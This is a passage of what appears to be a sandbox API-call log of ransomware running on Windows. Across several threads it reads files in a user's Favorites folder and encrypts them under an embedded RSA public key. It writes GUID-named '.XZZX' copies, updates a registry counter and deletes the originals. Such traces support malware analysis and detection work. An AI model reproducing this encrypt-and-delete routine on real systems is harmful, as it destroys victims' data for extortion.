lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0047.887] SetFilePointer (in: hFile=0x588, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0047.888] WriteFile (in: hFile=0x588, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x28, lpOverlapped=0x0) returned 1 [0047.888] SetFilePointer (in: hFile=0x588, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb2 [0047.888] WriteFile (in: hFile=0x588, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0047.888] SetFilePointer (in: hFile=0x588, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb7 [0047.888] SetErrorMode (uMode=0x1) returned 0x1 [0047.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0047.888] OutputDebugStringW (lpOutputString="end") [0047.888] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0047.888] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0047.888] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e42430) returned 1 [0047.889] CryptImportPublicKeyInfo (in: hCryptProv=0x3e42430, dwCertEncodingType=0x1, pInfo=0x3e3f8a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f8d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f8d8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e27d78) returned 1 [0047.889] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0047.889] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0047.889] CryptEncrypt (in: hKey=0x3e27d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0047.889] CryptEncrypt (in: hKey=0x3e27d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e424b8*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e424b8*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0047.889] WriteFile (in: hFile=0x588, lpBuffer=0x3e424b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e424b8*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0047.889] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0047.890] WriteFile (in: hFile=0x588, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0047.890] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0047.890] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0047.890] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x58c) returned 0x0 [0047.890] RegQueryValueExW (in: hKey=0x58c, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x4c, lpcbData=0x417dfdc*=0x4) returned 0x0 [0047.890] RegCloseKey (hKey=0x58c) returned 0x0 [0047.890] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x58c) returned 0x0 [0047.890] RegSetValueExW (in: hKey=0x58c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x4d, cbData=0x4 | out: lpData=0x417dfec*=0x4d) returned 0x0 [0047.890] RegCloseKey (hKey=0x58c) returned 0x0 [0047.890] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.891] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.891] CloseHandle (hObject=0x588) returned 1 [0047.892] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0047.892] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0047.892] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url")) returned 1 [0047.893] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url")) returned 0 Thread: id = 172 os_tid = 0x870 [0047.873] lstrcpyA (in: lpString1=0x46cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0047.873] lstrcpyW (in: lpString1=0x46cf460, lpString2="Windows Live Gallery.url" | out: lpString1="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0047.873] lstrcpyW (in: lpString1=0x46ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0047.873] SetErrorMode (uMode=0x1) returned 0x1 [0047.873] lstrcpyW (in: lpString1=0x46cf860, lpString2="Windows Live Gallery.url" | out: lpString1="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0047.873] CoCreateGuid (in: pguid=0x46ce440 | out: pguid=0x46ce440*(Data1=0xc3744630, Data2=0xb3e2, Data3=0x43ef, Data4=([0]=0xb8, [1]=0x31, [2]=0xe7, [3]=0xdd, [4]=0xb3, [5]=0x71, [6]=0x53, [7]=0x81))) returned 0x0 [0047.873] wsprintfW (in: param_1=0x46cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0047.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x46cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0047.873] wsprintfW (in: param_1=0x46ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\D9B986602FBC15FEC37446303428FA46.XZZX") returned 94 [0047.873] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="XZZX") returned 0x0 [0047.873] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", dwFileAttributes=0x20) returned 1 [0047.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x59c [0047.894] ReadFile (in: hFile=0x59c, lpBuffer=0x34e218, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x46ce418, lpOverlapped=0x0 | out: lpBuffer=0x34e218*, lpNumberOfBytesRead=0x46ce418*=0x85, lpOverlapped=0x0) returned 1 [0047.894] CloseHandle (hObject=0x59c) returned 1 [0047.894] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0047.894] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0047.895] SetErrorMode (uMode=0x1) returned 0x1 [0047.895] lstrcpyW (in: lpString1=0x46ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0047.895] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42540) returned 1 [0047.897] CryptGenKey (in: hProv=0x3e42540, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27fb8) returned 1 [0048.036] CryptExportKey (in: hKey=0x3e27fb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x46ce41c | out: pbData=0x0*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0048.036] CryptExportKey (in: hKey=0x3e27fb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x46ce41c | out: pbData=0x3e60000*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0048.036] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0048.037] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0048.037] CryptDestroyKey (hKey=0x3e27fb8) returned 1 [0048.037] CryptReleaseContext (hProv=0x3e42540, dwFlags=0x0) returned 1 [0048.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\D9B986602FBC15FEC37446303428FA46.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\d9b986602fbc15fec37446303428fa46.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58c [0048.037] WriteFile (in: hFile=0x58c, lpBuffer=0x34e218*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x34e218*, lpNumberOfBytesWritten=0x46ce438*=0x85, lpOverlapped=0x0) returned 1 [0048.037] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0048.038] WriteFile (in: hFile=0x58c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0048.038] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0048.038] WriteFile (in: hFile=0x58c, lpBuffer=0x46cf860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x46cf860*, lpNumberOfBytesWritten=0x46ce438*=0x30, lpOverlapped=0x0) returned 1 [0048.038] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xba [0048.038] WriteFile (in: hFile=0x58c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0048.038] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbf [0048.038] SetErrorMode (uMode=0x1) returned 0x1 [0048.038] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0048.038] OutputDebugStringW (lpOutputString="end") [0048.038] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õl\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0048.038] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x46cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8 | out: pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8) returned 1 [0048.038] CryptAcquireContextW (in: phProv=0x46cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x46cd3e4*=0x3e42540) returned 1 [0048.039] CryptImportPublicKeyInfo (in: hCryptProv=0x3e42540, dwCertEncodingType=0x1, pInfo=0x42e0530*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0560*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0568*, PublicKey.cUnusedBits=0x0), phKey=0x46cd3ec | out: phKey=0x46cd3ec*=0x3e28078) returned 1 [0048.039] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0048.040] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0048.040] CryptEncrypt (in: hKey=0x3e28078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x46cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x46cd3f0*=0x80) returned 1 [0048.040] CryptEncrypt (in: hKey=0x3e28078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e425c8*, pdwDataLen=0x46cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e425c8*, pdwDataLen=0x46cd3e8*=0x80) returned 1 [0048.040] WriteFile (in: hFile=0x58c, lpBuffer=0x3e425c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e425c8*, lpNumberOfBytesWritten=0x46ce438*=0x80, lpOverlapped=0x0) returned 1 [0048.040] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0048.040] WriteFile (in: hFile=0x58c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0048.040] GetUserNameW (in: lpBuffer=0x46ce1f8, pcbBuffer=0x46cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x46cdfe0) returned 1 [0048.040] wsprintfW (in: param_1=0x46cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0048.040] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe4 | out: phkResult=0x46cdfe4*=0x5a4) returned 0x0 [0048.040] RegQueryValueExW (in: hKey=0x5a4, lpValueName="E1010314", lpReserved=0x0, lpType=0x46cdfd8, lpData=0x46cdfec, lpcbData=0x46cdfdc*=0x4 | out: lpType=0x46cdfd8*=0x4, lpData=0x46cdfec*=0x4d, lpcbData=0x46cdfdc*=0x4) returned 0x0 [0048.040] RegCloseKey (hKey=0x5a4) returned 0x0 [0048.040] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe8 | out: phkResult=0x46cdfe8*=0x5a4) returned 0x0 [0048.041] RegSetValueExW (in: hKey=0x5a4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x46cdfec*=0x4e, cbData=0x4 | out: lpData=0x46cdfec*=0x4e) returned 0x0 [0048.041] RegCloseKey (hKey=0x5a4) returned 0x0 [0048.041] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.041] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.041] CloseHandle (hObject=0x58c) returned 1 [0048.042] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0048.043] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0048.043] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url")) returned 1 [0048.044] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url")) returned 0 Thread: id = 173 os_tid = 0xa30 [0048.178] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0048.178] lstrcpyW (in: lpString1=0x417f460, lpString2="Windows Live Mail.url" | out: lpString1="Windows Live Mail.url") returned="Windows Live Mail.url" [0048.178] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0048.178] SetErrorMode (uMode=0x1) returned 0x1 [0048.178] lstrcpyW (in: lpString1=0x417f860, lpString2="Windows Live Mail.url" | out: lpString1="Windows Live Mail.url") returned="Windows Live Mail.url" [0048.178] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xe26af317, Data2=0x4765, Data3=0x4e56, Data4=([0]=0x8d, [1]=0xc3, [2]=0x79, [3]=0xc6, [4]=0xb8, [5]=0x83, [6]=0x10, [7]=0x16))) returned 0x0 [0048.178] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0048.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0048.178] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned 94 [0048.178] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="XZZX") returned 0x0 [0048.178] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", dwFileAttributes=0x20) returned 1 [0048.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58c [0048.179] ReadFile (in: hFile=0x58c, lpBuffer=0x34e218, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e218*, lpNumberOfBytesRead=0x417e418*=0x85, lpOverlapped=0x0) returned 1 [0048.180] CloseHandle (hObject=0x58c) returned 1 [0048.180] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0048.180] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0048.181] SetErrorMode (uMode=0x1) returned 0x1 [0048.181] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0048.181] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42650) returned 1 [0048.184] CryptGenKey (in: hProv=0x3e42650, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27fb8) returned 1 [0048.338] CryptExportKey (in: hKey=0x3e27fb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0048.338] CryptExportKey (in: hKey=0x3e27fb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x417e41c | out: pbData=0x3e60000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0048.338] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0048.339] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0048.339] CryptDestroyKey (hKey=0x3e27fb8) returned 1 [0048.339] CryptReleaseContext (hProv=0x3e426d8, dwFlags=0x0) returned 0 [0048.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\FD9D491315D8C1EEE26AF31719F0A636.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\fd9d491315d8c1eee26af31719f0a636.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0048.339] WriteFile (in: hFile=0x588, lpBuffer=0x34e218*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e218*, lpNumberOfBytesWritten=0x417e438*=0x85, lpOverlapped=0x0) returned 1 [0048.340] SetFilePointer (in: hFile=0x588, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0048.340] WriteFile (in: hFile=0x588, 